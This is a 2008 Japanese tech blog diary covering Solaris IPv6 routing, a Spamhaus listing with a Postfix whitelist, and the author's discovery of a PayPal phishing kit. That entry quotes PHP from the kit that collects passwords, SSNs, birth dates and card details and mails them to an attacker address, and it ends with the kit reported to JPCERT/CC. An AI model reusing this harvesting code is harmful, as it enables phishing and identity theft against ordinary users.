|
|
wiki.tomocha.netがSolaris Zone上で動いているのですが、そーとー、IPv6で使うのには癖があるようです。
Solarisの場合、ip.tun0 というデバイスを使い、GREトンネルを作成するのですが、ip.tun0というデバイスは、Zone上にインターフェースとして作成することができません。
*1
すなわち、ip.tun0 からやってきたパケットをルーティングして、物理インターフェースやリンクローカルにアドレスを付け、それを割当、IPv6をしゃべると言うことになるのですが、問題はルーティングなのです。
Zone上では、StaticRouteやDefaultRouteを設定できず、グローバルゾーン上のルーティングに基づくのですが、デフォルトゲートウェイは、ip.tun0に向けるが、zoneからみれば、物理インターフェースのリンクローカルがデフォルトゲートウェイとなり、グローバルZone上からルーティングをさせる必要があります。
ここでリンクローカルのアドレスを使ったりするのですが、Solarisでは*BSDやLinuxに存在するどのインターフェースを使うか明示的に設定できないのです。
すなわち、DefaultRouteを複数書いてやる必要があったりしますが、自分自身のパケットをうまくルーティングできないといった問題がありました。
仕方なく、一端Zone上に割り当てているインターフェースからルーティングを行う別箱へ渡し、そこから、パケットを返し、ip.tun0へ渡すということを行えばできるようでした。
あと、defaultrouterに相当するdefaultrouter6 みたいなものがなかったりと、いろいろと大変そうです。探せば有るのかもしれませんが、起動スクリプトといったもので対応するしかなさそうな気がします。
自分自身でトンネルを掘り、がんばってルーティングを行わず、IPv6 Reachableなネットワーク上で使う分にはおそらく困らないでしょう。
仮想化、トンネルを一台の箱で行うと問題が出るようです。こういった使い方するひといるのかなあ?(^^;
今じゃ、IX2015が破格で売られていますので、そういう箱を使ってGREトンネルを造った方が安くて楽かもしれません。
リンクローカルのアドレスがめんどくさそうですが…。
ということで、試行錯誤して試験的にIPv6に対応してみました。
*1:
zoneから見れば、ip.tun0というデバイスを知らないので、グローバルゾーン上にあるリンクローカルとなるゲートウェイにはパケットが投げれません。
bb:- > nmap 210.174.204.115
Starting Nmap 4.62 ( http://nmap.org ) at 2008-11-06 23:53 JST
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap finished: 1 IP address (0 hosts up) scanned in 0.032 seconds
という画面があり、whoisしてみたところ、
210.174.204.112/28 株式会社東京放送 のようだ(笑)
それにしても、番組中では、外が明るいのに、なんで、23:53なのでしょう?(ぉ
個人的には、このIPアドレスに対してnmapがどれぐらい来るか観察して貰いたい今日この頃です。> 株式会社東京放送 さんのなかの方々
「Yahoo!ケータイ」トップページについてを見る限りでは、2009年2月1日(日)以降有料化になるらしい。
すなわち、利用プラン変更等、webからたどり、暗証番号をいれ、確認後電話でプラン変更を行うという作業についてもお金がかかるわけですか。
また、利用料金明細を見るだけでもお金がかかるようになるわけですか。最悪ですね…。
後者については、ネットで見れるのであまり関係は無さそうですが、うっかりとボタンを押してしまうことを考えるとひどいなあと思います。
パケ定額等一切付けてないので、まず、webをみようとすることが有りませんが、うっかり作業中に押してしまった、なにかに当たってボタンおされてしまったということが数ヶ月に1,2回程度有る。これを防ぐ手だては内のだろうか?
今後発売される機種には、ブラウザを起動したあと、表示しますか?といった確認が出るようになるのだろうか。
パケット割引等を付けている前提で考えないで欲しい。
*
[Internet] PayPal フィッシングサイトの元となるツール…
とんでもないもの…見つけてしまいました。
いいのかい、これ(汗)
http://210.***.***.***/PayPal.tgz
そして、そのサーバにはフィッシングサイトが仕掛けられていました。
$ lv carcabot.php
---
$hostname = gethostbyaddr($ip);
$message = "-----------------+ PayPal USA Bank Spam Result +-----------------\n";
$message .= "Email address : $user\n";
$message .= "PayPal Password : $pass\n\n";
$message .= "Full Name : $fullname\n";
$message .= "Mother Maiden Name : $mmn\n";
$message .= "Date of Birth : $bday/$bmonth/$byear\n";
$message .= "Social Security No : $ssn1-$ssn2-$ssn3\n";
$message .= "Phone Number : $userphone";
$meesage = "$message$defaultmsg$secmsg$cc1msg$cc2msg$cc3msg$cc4msg";
$measage = $default + $sec + $cc1 + $cc2 + $cc3 + $cc4;
$rnessage = "$meesage\n";
$rnessage .= "---------------------------------------------------------\n";
$rnessage .= "Client IP : $ip\n";
$rnessage .= "HostName : $hostname\n";
$rnessage .= "Script : ".$_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME']."\n";
$rnessage .= "-----------------+ Created in 2008 by CarcaBot+------------------\n";
$emailme="****@******"; // Write your mail here ← gmailが埋まってた
明らかに…。フィッシングの様です。
検証環境で実験してみたところ、フォームに入力後、PayPalの本物サイトへ飛ばされ誘導されるようになっており、POSTと同時に、指定されたメールアドレスにクレジットカードの番号や、PayPalのアカウント情報等がメールされました。クレジットカード番号は、適当に入力すると拒否され、正しいパターンに基づいて入力するチェックまで入っています。
送信メール内容は上記の感じです。
*
[Internet] value-domain のメールサーバがRBLに登録
8月頃からメールが届かなくて何故だと調べていたが、メールのログで、value-domain.com で検索していたので見つからず。
まあいいやとおもい、放置していたのだが、ドメインの有効期限の通知メールやら届かないので調査してみた。(1コExpiresれてしまったので…。まだ、猶予期間だったため間に合った。)
で、過去のメールからメールヘッダを調査したところ、メールサーバは、sakura1.digi-rock.com[202.222.31.77]。すなわち、digi-rock.com で検索してればよかったようだ。
Nov 9 06:01:58 ns0 postfix/smtpd[23994]: NOQUEUE: reject: RCPT from sakura1.digi-rock.com[202.222.31.77]: 554 5.7.1 Service unavailable; Client host [202.222.31.77] blocked using zen.spamhaus.org; http://www.spamhaus.org/SBL/sbl.lasso?query=SBL67399; from=<root@sakura1.digi-rock.com> to=<***@example.com> proto=SMTP helo=<sakura1.digi-rock.com>
情報からわかることは、zen.spamhaus.org に登録されているぞ、ということ。情報を見たければ
URLを開けば詳細がわかる。
見てみたところ、次のように書いてある。
page carefully.
It contains the
reason for the
listing and who
to contact about it. Ref: SBL67399
202.222.31.77/32 is listed on the Spamhaus Block List (SBL)
27-Aug-2008 03:37 GMT | SR10
landing site for cell phone spammer.
Japanese language spam to cell phones sourced in the philipines
(SBL 67396) landing sites:
ぉぃぉぃ・・・。ケイタイへのスパムって(-_-;;;)
そういうわけで、届かないという状況の人は、zen.spamhaus.org を外すか、ホワイトリストを登録してください…。
*
[Internet] value-domain のメールサーバがRBLに登録 その後
返事があったが、全く勘違いしているようで。。。
Value-Domainの回答としては、次の通り
- 何らかの理由によりユーザー様ドメインが対象になっております場合、緊急の改善が必要な場合などは、他のサーバへ移動していただく…
- 共用サーバー(ValueDomainのレンタルサーバのことをいっている)であること、あくまでも先方様(RBL側)の判断
- 解決まで待てない場合は、再移動してください
あのー。。。自社のサーバで実施してください(笑)
自社の自分自身の使っている重要なメールサーバ(共有サーバではない)であるはずのところが、RBLに登録されているにもかかわらず、まったく危機感がないようで、のんきな対応だ。。。だめだこりゃ。安かろう悪かろうの対応なのかしらねぇ。売上高はそーとーあるようですが。
なお、関連するスレッドのリンクをわざわざ連絡、コメントをのこしているのにもかかわらず的外れの回答でした。おもしろいネタをありがとう。。。
ちなみにそのValueDomainから届くメールには、ドメイン有効期限、お知らせメール、領収明細書などが含まれています。そういうサーバがRBLに登録されること自体問題があるのではないでしょうか。運用体制が問われる状況ですね。
*
[Internet] value-domain のメールサーバがRBLに登録 その後 (追記)
勘違いしていて申し訳ありませんと、連絡がありました。
内容からする察するには、value-domain側も認識しているようで…。
ですが、ユーザのコミュニティーとして提供している掲示板については、
至って放置で周知されていないようです。
可能性があることといったものを、周知して欲しいものです。
尚、関連するスレッドとしては、
ドメイン有効期限のお知らせなどのメールが送信されてこない - XREA&CORE SUPPORT BOARD:
にありますが、もうそろそろ1ヶ月たとうとしていますが、この有様です。
皆さん気をつけましょう…。
value-domain の行動から伺えることとして、
「その他のアドレスを使え、メールは信用するな、届かないのを前提で運用しろ」
というスタンスのようです。
そういう空気が上記のスレッドから読めてしまいました。
皆さん気をつけてください。
postfixについては余り詳しくないですが、次のようにしておけば、とりあえずは大丈夫なのかな。(未確認)
/usr/local/etc/postfix/main.cf
----
smtpd_client_restrictions =
permit_mynetworks,
check_client_access hash:/usr/local/etc/postfix/restrict_clients,
reject_rbl_client ... ,
permit
----
/usr/local/etc/postfix/restrict_clients
----
202.222.31.77 OK
----
*
[IPv6] www.ipv6domain.com が IPv6に対応していない
$ host www.ipv6domain.com
www.ipv6domain.com has address 61.33.161.10
$ host -taaaa www.ipv6domain.com
www.ipv6domain.com has no AAAA record
IPv6という名前を使って欲しくないな、とおもう今日この頃。
まあ、感じたところによると、AddPacという会社はIPv6Readyな製品を出しているからそういう名前を付けているのだろうか。
誤解を生むドメインだ。
そういう名前を使う以上サイトもIPv6に対応させようよね。
これはひどいと思った人はどれぐらいいるのでしょう?(^^;)
*
[Internet] PayPal フィッシングサイトの元となるツール… その後
JPCERT/CC経由でインシデント報告を入れていただきましたが、対応されたようです。
月曜日の夕方に報告して本日先ほど対応したとのメールが来ていました。
対応が早くてびっくり。
Diary for 5 day(s)